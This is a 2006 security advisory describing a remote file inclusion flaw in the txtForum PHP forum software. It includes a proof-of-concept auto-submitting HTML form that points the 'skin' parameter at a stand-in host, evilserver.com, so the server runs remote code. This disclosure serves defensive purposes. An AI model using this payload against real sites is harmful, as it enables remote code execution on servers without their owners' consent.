txtForum: Script Injection Vulnerability

2006-03-09T00:00:00
ID SECURITYVULNS:DOC:11768
Type securityvulns
Reporter Securityvulns
Modified 2006-03-09T00:00:00

Description

=========================================================== txtForum: Script Injection Vulnerability =========================================================== Technical University of Vienna Security Advisory TUVSA-0603-004, March 9, 2006 ===========================================================

Affected applications

txtForum (http://sourceforge.net/projects/txtforum1)

Versions 1.0.4-dev and prior.

Description

There is an include statement in the file common.php on line 46 that makes use of the SKIN constant, which was previously defined via the $skin variable. Under the following conditions, an attacker can inject arbitrary PHP script into the application:

  • register_globals has to be active
  • remote file inclusions have to be allowed

All the attacker has to do is find a path through the program that doesn't initialize the $skin variable. The attacker does not require access to an account in the forum. Here is an example for an attack page:

<form action='http://localhost/txtforum104/login.php' method="post"> <input type="text" name="login_username" value="admin"/> <input type="text" name="login_password" value="xyz"/> <input type="text" name="skin" value="http://evilserver.com"/> <input type="submit"> </form> <script type="text/javascript"> document.forms[0].submit(); </script>

This leads to execution of the code in http://evilserver.com/header.tpl. There might be further possibilities for exploits (similar include statements can also be found on lines 53 and 61).

Solution

There is no solution to this issue yet.

Timeline:

March 2, 2006: Vulnerability reported to and acknowledged by the developer (I.Konforti). A fix is not planned.

March 9, 2006: Advisory submission.

References

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-004.txt

Nenad Jovanovic Secure Systems Lab Technical University of Vienna www.seclab.tuwien.ac.at